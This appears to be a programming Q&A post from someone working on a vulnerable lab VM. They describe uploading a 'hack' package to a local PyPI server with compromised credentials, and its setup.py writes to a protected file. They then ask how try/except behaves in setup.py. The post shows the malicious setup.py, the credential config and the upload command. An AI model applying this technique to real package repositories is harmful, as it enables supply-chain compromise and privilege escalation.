# How does setup.py evaluate a try: except?

Tags: python

I'm experimenting with setup.py inside a vulnerable VM that's running a pypi server with a listener on localhost:PORT

My current account does not have write access to the following file :
/path/to/a/protected/file

What i do have access to, are the credentials of the pypi repository running on localhost:PORT

So to take advantage of that i've created a local "hack" package, with nothing more than the .pypirc to configure the compromised repository's credentials and the setup.py containing the malicious code.

.pypirc

```
[distutils]
index-servers =
  hack


[hack]
repository: http://127.0.0.1:PORT
username: compromised_username
password: compromised_passwd
```

setup.py

```
import setuptools

try:
  with open("/path/to/a/protected/file", "w+") as fh:
    fh.write("something really bad")
except:
  setuptools.setup(
    name="hack",
    version="0.0.1",
    author="Example Author",
    author_email="author@example.com",
    description="A small example package",
  )
```

To upload the malicious package i then just have to run :

```
python setup.py sdist upload -r hack
```

Now for the interesting bit, this does actually result in opening the file, and writes something really bad in it.

BUT

The same code (setup.py) returns a permission denied when trying to access the file **if i remove the try: except clause.**

This leaves me with an utter confusion about the way setup.py evaluates the try: except.

The way i understand try: except is if the code under try works then ignore the except, otherwise, if the error class is catched by the except then run what's inside except.

But this goes against that understanding...